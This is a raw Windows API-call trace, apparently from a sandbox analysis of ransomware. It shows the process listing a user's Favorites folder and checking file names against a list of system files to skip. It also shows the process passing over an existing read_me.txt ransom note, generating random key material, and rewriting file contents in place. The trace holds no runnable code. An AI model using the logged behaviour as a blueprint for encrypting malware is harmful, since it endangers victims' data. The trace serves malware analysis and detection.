[0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.314] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.314] GetProcessHeap () returned 0x4f10000 [0083.314] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.314] GetProcessHeap () returned 0x4f10000 [0083.314] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.314] GetProcessHeap () returned 0x4f10000 [0083.314] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.314] GetProcessHeap () returned 0x4f10000 [0083.314] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.314] GetProcessHeap () returned 0x4f10000 [0083.314] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.314] GetProcessHeap () returned 0x4f10000 [0083.314] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.314] GetProcessHeap () returned 0x4f10000 [0083.314] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.314] GetProcessHeap () returned 0x4f10000 [0083.314] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.314] GetProcessHeap () returned 0x4f10000 [0083.314] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.314] GetProcessHeap () returned 0x4f10000 [0083.314] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.314] SetFilePointerEx (in: hFile=0x938, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.314] WriteFile (in: hFile=0x938, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0083.314] WriteFile (in: hFile=0x938, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0083.314] GetProcessHeap () returned 0x4f10000 [0083.314] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0083.314] GetProcessHeap () returned 0x4f10000 [0083.314] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.314] GetProcessHeap () returned 0x4f10000 [0083.315] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.315] CloseHandle (hObject=0x938) returned 1 [0083.315] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 110 [0083.315] GetProcessHeap () returned 0x4f10000 [0083.315] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c90050 [0083.316] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*") returned 45 [0083.316] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24f6c480, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24f6c480, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe8e8 [0083.316] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\.") returned 45 [0083.316] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24f6c480, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24f6c480, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0083.316] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\..") returned 46 [0083.317] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0083.317] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0083.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x91c [0083.317] StrStrW (lpFirst="msn autos.url", lpSrch="read_me.txt") returned 0x0 [0083.317] StrStrW (lpFirst="msn autos.url", lpSrch="autoexec.bat") returned 0x0 [0083.317] StrStrW (lpFirst="msn autos.url", lpSrch="desktop.ini") returned 0x0 [0083.317] StrStrW (lpFirst="msn autos.url", lpSrch="autorun.inf") returned 0x0 [0083.317] StrStrW (lpFirst="msn autos.url", lpSrch="ntuser.dat") returned 0x0 [0083.317] StrStrW (lpFirst="msn autos.url", lpSrch="iconcache.db") returned 0x0 [0083.317] StrStrW (lpFirst="msn autos.url", lpSrch="bootsect.bak") returned 0x0 [0083.317] StrStrW (lpFirst="msn autos.url", lpSrch="boot.ini") returned 0x0 [0083.317] StrStrW (lpFirst="msn autos.url", lpSrch="ntuser.dat.log") returned 0x0 [0083.317] StrStrW (lpFirst="msn autos.url", lpSrch="thumbs.db") returned 0x0 [0083.317] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 219 [0083.317] QueueUserWorkItem (Function=0x404e00, Context=0x91c, Flags=0x0) returned 1 [0083.317] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0083.317] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0083.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x93c [0083.327] StrStrW (lpFirst="msn entertainment.url", lpSrch="read_me.txt") returned 0x0 [0083.327] StrStrW (lpFirst="msn entertainment.url", lpSrch="autoexec.bat") returned 0x0 [0083.327] StrStrW (lpFirst="msn entertainment.url", lpSrch="desktop.ini") returned 0x0 [0083.327] StrStrW (lpFirst="msn entertainment.url", lpSrch="autorun.inf") returned 0x0 [0083.327] StrStrW (lpFirst="msn entertainment.url", lpSrch="ntuser.dat") returned 0x0 [0083.327] StrStrW (lpFirst="msn entertainment.url", lpSrch="iconcache.db") returned 0x0 [0083.327] StrStrW (lpFirst="msn entertainment.url", lpSrch="bootsect.bak") returned 0x0 [0083.327] StrStrW (lpFirst="msn entertainment.url", lpSrch="boot.ini") returned 0x0 [0083.328] StrStrW (lpFirst="msn entertainment.url", lpSrch="ntuser.dat.log") returned 0x0 [0083.328] StrStrW (lpFirst="msn entertainment.url", lpSrch="thumbs.db") returned 0x0 [0083.328] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 220 [0083.328] QueueUserWorkItem (Function=0x404e00, Context=0x93c, Flags=0x0) returned 1 [0083.328] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0083.328] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0083.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x934 [0083.328] StrStrW (lpFirst="msn money.url", lpSrch="read_me.txt") returned 0x0 [0083.328] StrStrW (lpFirst="msn money.url", lpSrch="autoexec.bat") returned 0x0 [0083.328] StrStrW (lpFirst="msn money.url", lpSrch="desktop.ini") returned 0x0 [0083.328] StrStrW (lpFirst="msn money.url", lpSrch="autorun.inf") returned 0x0 [0083.328] StrStrW (lpFirst="msn money.url", lpSrch="ntuser.dat") returned 0x0 [0083.328] StrStrW (lpFirst="msn money.url", lpSrch="iconcache.db") returned 0x0 [0083.328] StrStrW (lpFirst="msn money.url", lpSrch="bootsect.bak") returned 0x0 [0083.328] StrStrW (lpFirst="msn money.url", lpSrch="boot.ini") returned 0x0 [0083.328] StrStrW (lpFirst="msn money.url", lpSrch="ntuser.dat.log") returned 0x0 [0083.328] StrStrW (lpFirst="msn money.url", lpSrch="thumbs.db") returned 0x0 [0083.328] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 221 [0083.328] QueueUserWorkItem (Function=0x404e00, Context=0x934, Flags=0x0) returned 1 [0083.328] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0083.328] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0083.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x920 [0083.329] StrStrW (lpFirst="msn sports.url", lpSrch="read_me.txt") returned 0x0 [0083.329] StrStrW (lpFirst="msn sports.url", lpSrch="autoexec.bat") returned 0x0 [0083.329] StrStrW (lpFirst="msn sports.url", lpSrch="desktop.ini") returned 0x0 [0083.329] StrStrW (lpFirst="msn sports.url", lpSrch="autorun.inf") returned 0x0 [0083.329] StrStrW (lpFirst="msn sports.url", lpSrch="ntuser.dat") returned 0x0 [0083.329] StrStrW (lpFirst="msn sports.url", lpSrch="iconcache.db") returned 0x0 [0083.329] StrStrW (lpFirst="msn sports.url", lpSrch="bootsect.bak") returned 0x0 [0083.329] StrStrW (lpFirst="msn sports.url", lpSrch="boot.ini") returned 0x0 [0083.329] StrStrW (lpFirst="msn sports.url", lpSrch="ntuser.dat.log") returned 0x0 [0083.329] StrStrW (lpFirst="msn sports.url", lpSrch="thumbs.db") returned 0x0 [0083.329] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 222 [0083.329] QueueUserWorkItem (Function=0x404e00, Context=0x920, Flags=0x0) returned 1 [0083.329] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0083.329] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0083.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x914 [0083.356] StrStrW (lpFirst="msn.url", lpSrch="read_me.txt") returned 0x0 [0083.356] StrStrW (lpFirst="msn.url", lpSrch="autoexec.bat") returned 0x0 [0083.356] StrStrW (lpFirst="msn.url", lpSrch="desktop.ini") returned 0x0 [0083.356] StrStrW (lpFirst="msn.url", lpSrch="autorun.inf") returned 0x0 [0083.356] StrStrW (lpFirst="msn.url", lpSrch="ntuser.dat") returned 0x0 [0083.356] StrStrW (lpFirst="msn.url", lpSrch="iconcache.db") returned 0x0 [0083.356] StrStrW (lpFirst="msn.url", lpSrch="bootsect.bak") returned 0x0 [0083.356] StrStrW (lpFirst="msn.url", lpSrch="boot.ini") returned 0x0 [0083.357] StrStrW (lpFirst="msn.url", lpSrch="ntuser.dat.log") returned 0x0 [0083.357] StrStrW (lpFirst="msn.url", lpSrch="thumbs.db") returned 0x0 [0083.357] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 223 [0083.357] QueueUserWorkItem (Function=0x404e00, Context=0x914, Flags=0x0) returned 1 [0083.357] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0083.357] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0083.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90c [0083.357] StrStrW (lpFirst="msnbc news.url", lpSrch="read_me.txt") returned 0x0 [0083.357] StrStrW (lpFirst="msnbc news.url", lpSrch="autoexec.bat") returned 0x0 [0083.357] StrStrW (lpFirst="msnbc news.url", lpSrch="desktop.ini") returned 0x0 [0083.357] StrStrW (lpFirst="msnbc news.url", lpSrch="autorun.inf") returned 0x0 [0083.357] StrStrW (lpFirst="msnbc news.url", lpSrch="ntuser.dat") returned 0x0 [0083.357] StrStrW (lpFirst="msnbc news.url", lpSrch="iconcache.db") returned 0x0 [0083.357] StrStrW (lpFirst="msnbc news.url", lpSrch="bootsect.bak") returned 0x0 [0083.357] StrStrW (lpFirst="msnbc news.url", lpSrch="boot.ini") returned 0x0 [0083.357] StrStrW (lpFirst="msnbc news.url", lpSrch="ntuser.dat.log") returned 0x0 [0083.357] StrStrW (lpFirst="msnbc news.url", lpSrch="thumbs.db") returned 0x0 [0083.357] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 224 [0083.357] QueueUserWorkItem (Function=0x404e00, Context=0x90c, Flags=0x0) returned 1 [0083.357] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24f6c480, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24f6c480, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24f6c480, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0083.358] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\read_me.txt") returned 55 [0083.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\read_me.txt" (normalized: "c:\\users\\default\\favorites\\msn websites\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x908 [0083.358] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0083.358] CloseHandle (hObject=0x908) returned 1 [0083.358] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24f6c480, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24f6c480, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24f6c480, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0083.358] FindClose (in: hFindFile=0x7cfe8e8 | out: hFindFile=0x7cfe8e8) returned 1 [0083.358] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\read_me.txt") returned 55 [0083.358] GetProcessHeap () returned 0x4f10000 [0083.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c90050 | out: hHeap=0x4f10000) returned 1 [0083.358] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 107 [0083.358] GetProcessHeap () returned 0x4f10000 [0083.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c80048 | out: hHeap=0x4f10000) returned 1 [0084.366] SetFilePointerEx (in: hFile=0x768, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.366] ReadFile (in: hFile=0x768, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0084.366] SetFilePointerEx (in: hFile=0x768, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.366] GetProcessHeap () returned 0x4f10000 [0084.366] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.366] GetProcessHeap () returned 0x4f10000 [0084.366] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.366] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.366] GetProcessHeap () returned 0x4f10000 [0084.366] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0084.367] ReadFile (in: hFile=0x768, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.419] SetFilePointerEx (in: hFile=0x768, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.419] WriteFile (in: hFile=0x768, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.419] GetProcessHeap () returned 0x4f10000 [0084.419] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.419] GetProcessHeap () returned 0x4f10000 [0084.419] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.419] GetProcessHeap () returned 0x4f10000 [0084.419] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.419] GetProcessHeap () returned 0x4f10000 [0084.419] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.419] GetProcessHeap () returned 0x4f10000 [0084.419] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.419] GetProcessHeap () returned 0x4f10000 [0084.419] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.419] GetProcessHeap () returned 0x4f10000 [0084.419] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.419] GetProcessHeap () returned 0x4f10000 [0084.419] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.419] GetProcessHeap () returned 0x4f10000 [0084.419] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.419] GetProcessHeap () returned 0x4f10000 [0084.420] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 